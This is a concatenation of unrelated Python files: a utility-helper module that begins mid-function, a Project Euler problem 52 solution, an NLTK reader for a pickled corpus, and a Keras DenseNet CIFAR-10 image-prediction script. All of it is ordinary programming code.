return (datetime.datetime.now() + datetime.timedelta(days=days)).strftime(form)
def now(form='%Y-%m-%d %H:%M:%S'):
return datetime.datetime.now().strftime(form)
def now_ms(form='%Y-%m-%d %H:%M:%S'): # e.g. 2016-01-01 01:01:01.012
_now = datetime.datetime.now()
return _now.strftime(form) + '.' + "%03d" % round(float(_now.microsecond) / 1000)
def now_timestamp(): # e.g. 1451581261
return int(round(time.time()))
def now_timestamp_ms(): # e.g. 1451581261339
_now = datetime.datetime.now()
return int(time.mktime(
time.strptime(_now.strftime('%Y-%m-%d %H:%M:%S'), '%Y-%m-%d %H:%M:%S'))) * 1000 + _now.microsecond / 1000
def hours_ago(hours=0, form='%Y-%m-%d %H:%M:%S'):
return (datetime.datetime.now() - datetime.timedelta(hours=hours)).strftime(form)
def hours_later(hours=0, form='%Y-%m-%d %H:%M:%S'):
return (datetime.datetime.now() + datetime.timedelta(hours=hours)).strftime(form)
"""
File Helper
"""
def get_project_path():
_r = re.compile(r"(^.+[/\\])(.*)")
_p = os.path.abspath(__file__)
if os.path.exists("{}/.iparrot".format(_p)):
return _p
while re.search(_r, _p):
_p = re.findall(_r, _p)[0][0]
if os.path.exists("{}/.iparrot".format(_p)):
return _p
else:
_p = os.path.abspath(_p)
return os.path.abspath(__file__)
def get_file_name(file, ext=0):
file = str(file).split('/')[-1].split('\\')[-1]
return file if ext else file.replace(".{}".format(file.split('.')[-1]), '')
def get_file_path(file):
return os.path.dirname(file)
def make_dir(directory):
if not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError:
return False
return directory
def remove_dir(directory):
if os.path.exists(directory):
try:
if os.path.isfile(directory):
os.remove(directory)
elif os.path.isdir(directory):
shutil.rmtree(directory)
except OSError:
return False
return directory
def remove_file(filename):
if os.path.exists(filename):
try:
if os.path.isfile(filename):
os.remove(filename)
elif os.path.isdir(filename):
shutil.rmtree(filename)
except OSError:
return False
return filename
def copy_file(source, target):
try:
if os.path.isdir(source):
shutil.copytree(source, target)
else:
shutil.copy(source, target)
except OSError:
return False
return target
def get_dir_folders(directory):
if os.path.isdir(directory):
return [name for name in os.listdir(directory) if os.path.isdir(os.path.join(directory, name))]
else:
return []
def get_dir_files(directory):
if os.path.isdir(directory):
return ["{}/{}".format(directory, name) for name in os.listdir(directory) if os.path.isfile(os.path.join(directory, name))]
else:
return []
"""
Random Helper
"""
def get_random_integer(length=10, head=None, tail=None):
"""
:param length: an integer
:param head: to be started with
:param tail: to be ended with
:return: a random integer
"""
my_str = random.randint(10 ** (length-1), 10 ** length - 1)
if head:
head = str(head)
if len(head) >= length:
return head
my_str = int(head + str(str(my_str)[len(head):]))
if tail:
tail = str(tail)
if len(tail) >= length:
return tail
my_str = int(str(str(my_str)[:-len(tail)]) + tail)
return my_str
def get_random_string(length=10, simple=1, head=None, tail=None):
"""
:param length: an integer
:param simple:
:param head: to be started with
:param tail: to be ended with
:return: a random string
"""
if simple == 1: # base: digits and letters
src = str(string.digits) + string.ascii_letters
elif simple == 2: # on base, remove confusing letters: 0&O&o c&C I&l&1 k&K p&P s&S v&V w&W x&X z&Z
src = 'abdefghijmnqrtuyABDEFGHJLMNQRTUY23456789'
else: # on base, add some special letters
src = str(string.digits) + string.ascii_letters + '~!@#$%^&*,.-_=+'
# in case the length is too high
src = src * int((length / len(src) + 1))
my_str = ''.join(random.sample(src, length))
if head:
head = str(head)
if len(head) >= length:
return head
my_str = head + str(my_str[len(head):])
if tail:
tail = str(tail)
if len(tail) >= length:
return tail
my_str = str(my_str[:-len(tail)]) + tail
return str(my_str)
def get_random_phone(head=None, tail=None):
"""
:param head: to be started with
:param tail: to be ended with
:return: a random phone number in China
"""
length = 11
my_str = '1' + "".join(random.choice('3456789')) + "".join(random.choice(string.digits) for i in range(length-2))
if head:
head = str(head)
if len(head) >= length:
return head
my_str = head + str(my_str[len(head):])
if tail:
tail = str(tail)
if len(tail) >= length:
return tail
my_str = str(my_str[:-len(tail)]) + tail
return my_str
"""
Dict Helper
"""
# Traverse the dictionary/list to get all key/value pairs with depth of 1
def get_all_kv_pairs(item, prefix=None, mode=1):
"""
:param item: a dict or list, with any depth
:param prefix: prefix of a key, used when recursive
:param mode: 1: depth == 1, 0: extract keys of all levels
:return: all key/value pairs with depth of 1
"""
_pairs = {}
if not mode and prefix:
_pairs[prefix] = item
if not item and prefix:
_pairs[prefix] = item
if isinstance(item, dict): # A.B
for _key, _val in item.items():
_key = "{}.{}".format(prefix, _key) if prefix else _key
if not mode:
_pairs[_key] = _val
_pairs.update(get_all_kv_pairs(item=_val, prefix=_key, mode=mode))
elif isinstance(item, (list, set, tuple)): # A[0]
for i, _key in enumerate(item):
_key = "{}[{}]".format(prefix, i) if prefix else "[{}]".format(i)
if not mode:
_pairs[_key] = item[i]
_pairs.update(get_all_kv_pairs(item=item[i], prefix=_key, mode=mode))
else: # the end level
if prefix:
_pairs[prefix] = item
else:
_pairs[item] = ''
return _pairs
def get_matched_keys(key, keys, fuzzy=1):
"""
:param key: a node or a list of nodes, which would be matched with
:param keys: a list of nodes, which would be matched
:param fuzzy: 1-fuzzy match, 0-exact match
:return: a list of matched keys
"""
descendant_keys = []
if not isinstance(key, (list, set, tuple)):
key = [str(key), ]
if not isinstance(keys, (list, set, tuple)):
keys = [str(keys), ]
if not key:
return keys
for i_key in key:
for j_key in keys:
if fuzzy:
if i_key in j_key:
descendant_keys.append(j_key)
else:
if i_key == j_key:
descendant_keys.append(j_key)
elif j_key.startswith("{}.".format(i_key)):
descendant_keys.append(j_key)
elif j_key.startswith("{}[".format(i_key)):
descendant_keys.append(j_key)
return descendant_keys
# parameters to dict, e.g. date=0305&tag=abcd&id=123 => {'date': '0305', 'tag': 'abcd', 'id': 123}
def param2dict(item):
my_dict = {}
for i_item in str(item).split('&'):
i_arr = i_item.split('=')
my_dict[i_arr[0]] = i_arr[1]
return my_dict
# dict to parameters, e.g. {'date': '0305', 'tag': 'abcd', 'id': 123} => date=0305&tag=abcd&id=123
def dict2param(item):
if not isinstance(item, dict):
return str(item)
my_param = ''
for key, val in item.items():
my_param = my_param + "&{}={}".format(key, val) if my_param else "{}={}".format(key, val)
return my_param
def get_host_ip():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
ip = s.getsockname()[0]
finally:
s.close()
return ip
if __name__ == "__main__":
har_time2timestamp(har_time='aaaa')
print(get_project_path())
resp = {
"status.code": 200,
"content": {
"error": "",
"status": 200,
"usedtime": 0,
"srvtime": "2019-8-22 16:48:35",
"islogin": 0,
"iswork": True,
"tag": "3301c39cc5fc4448a3a325c231cfa475",
"data": {
"msgCode": "1000",
"msgInfo": "登录成功",
"data": "",
"RequestId": "e1e527d2-2a02-476c-954c-cf1bf0e61159",
"firstloginCoupon": "",
"MobileStatus": "1",
"MobileNo": "",
"LoginType": 1
}
},
"headers": {
"Date": "Thu, 22 Aug 2019 08:48:34 GMT",
"Content-Type": "application/json; charset=utf-8",
"Content-Length": "323",
"Connection": "keep-alive",
"Server": "openresty/1.11.2.1",
"Cache-Control": "private",
"X-AspNetMvc-Version": "4.0",
"Access-Control-Allow-Origin": "",
"X-AspNet-Version": "4.0.30319",
"X-Powered-By": "ASP.NET",
"id": "TCWEBV088154",
"Leonid-Ins": "735365034-HitConf-2[m]-59e85433a1a367bed390c711",
"p3p": "CP=\"IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\"",
"Leonid-addr": "NTguMjExLjExMS4xOA==",
"Leonid-Time": "0"
},
"cookies": {}
}
print(json.dumps(get_all_kv_pairs(item=resp, mode=0)))
|
# coding=utf-8
'''
Problem 52
12 September 2003
It can be seen that the number, 125874, and its double, 251748, contain exactly the same digits, but in a different order.
Find the smallest positive integer, x, such that 2x, 3x, 4x, 5x, and 6x, contain the same digits.
'''
import euler
for i in range(1, 10**6):
valid = True
for j in range(2, 7):
if not euler.is_permutation(i, i*j):
valid = False
break
if (valid):
print i
break
|
""" To Read pickle files from Corpus """
import nltk
import pickle
from nltk.corpus.reader.api import CorpusReader
from nltk.corpus.reader.api import CategorizedCorpusReader
doc_pattern = r'(?!\.)[a-z_\s]+/[a-f0-9]+\.json'
pkl_pattern = r'(?!\.)[a-z_\s]+/[a-f0-9]+\.pickle'
cat_pattern = r'([a-z_\s]+)/.*'
class PickledCorpusReader(CategorizedCorpusReader,CorpusReader):
def __init__(self, root, fileids=pkl_pattern, **kwargs):
"""
Initialize the corpus reader. Categorized arguments
('cat_pattern', 'cat_map', and 'cat_file') are passed
to the 'CategorizedCorpusReader' constructor. The remaining
arguments are passed to the CorpusReader constructor.
"""
# Add the default category pattern if not passed into the class
if not any (key.startswith('cat_') for key in kwargs.keys()):
kwargs['cat_pattern'] = cat_pattern
# Initialize NLP Corpus reader objects
CategorizedCorpusReader.__init__(self, kwargs)
CorpusReader.__init__(self, root, fileids)
def resolve(self, fileids, categories):
"""
Returns a list of fileids or categories depending on what is passed
to each internal corpus reader function.
"""
if fileids is not None and categories is not None:
raise ValueError ("Specify fileids or categories, not both")
if categories is not None:
return self.fileids(categories)
return fileids
def docs(self, fileids=None, categories=None):
"""
Returns the document from a pickled object for each file in corpus.
"""
#List the fileids & categories
fileids = self.resolve(fileids, categories)
# Load one document into memory at a time
for path, enc, fileid in self.abspaths(fileids, True, True):
with open(path,'rb') as f:
yield pickle.load(f)
def paragraphs(self, fileids=None, categories=None):
"""
Returns a genetator where each paragraph contains a list of sentences.
"""
for doc in self.docs(fileids, categories):
for paragraph in doc:
yield paragraph
def sentences(self, fileids=None, categories=None):
"""
Returns a generator where each sentence contains a list of tokens
"""
for paragraph in self.paragraphs(fileids, categories):
for sent in paragraph:
yield sent
def tokens(self, fileids=None, categories=None):
"""
Returns a list of tokens.
"""
for sent in self.sentences(fileids,categories):
for token in sent:
yield token
def words(self, fileids=None, categories=None):
"""
Returns a list of (token, tag) tuples.
"""
for token in self.tokens(fileids, categories):
yield token[0]
if __name__ == '__main__':
from collections import Counter
corpus = PickledCorpusReader('../corpus')
words = Counter(corpus.words())
print("{:,} vocabulary {:,} word count".format(len(words.keys()),sum(words.values())))
|
import cv2
import numpy as np
from keras.optimizers import SGD
import keras.backend as K
import keras
import pylab as plt
from keras.datasets import cifar10
from densenet121 import DenseNet
# 数据的导入和预处理
(x_train,y_train),(x_test,y_test)=cifar10.load_data()
y_test=keras.utils.to_categorical(y_test,10)
# 模型已经训练好了,将训练好的权重加入到模型中
weights_path = 'imagenet_models/densenet121_weights_tf_cifar10.h5'
model = DenseNet(reduction=0.5, classes=10, weights_path=weights_path)
sgd = SGD(lr=1e-2, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['accuracy'])
# 对模型进行打分,本函数按batch计算在某些输入数据上模型的误差,
# score=model.evaluate(x_test,y_test,batch_size=64)
# print(score)
# 用一张图片测试模型
# im = cv2.resize(cv2.imread('E:/ImageProce/DenseNet/DenseNet-Keras-master/resources/cat32.jpg'), (32, 32)).astype(np.float32)
# im=cv2.imread('E:/ImageProce/DenseNet/DenseNet-Keras-master/resources/cat32.jpg')
im=cv2.imread('E:/ImageProce/DenseNet/DenseNet-Keras-master/resources/airplane.jpg')
plt.imshow(im[...,-1::-1])
# 因为opencv读取进来的是bgr顺序的,而imshow需要的是rgb顺序,因此需要先反过来
plt.show()
# Insert a new dimension for the batch_size
im = np.expand_dims(im, axis=0)
out = model.predict(im)
print(out)
classes = []
with open('resources/cifar10_classes.txt', 'r') as list_:
for line in list_:
classes.append(line.rstrip('\n'))
print(classes)
print('Prediction: '+str(classes[np.argmax(out)]))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.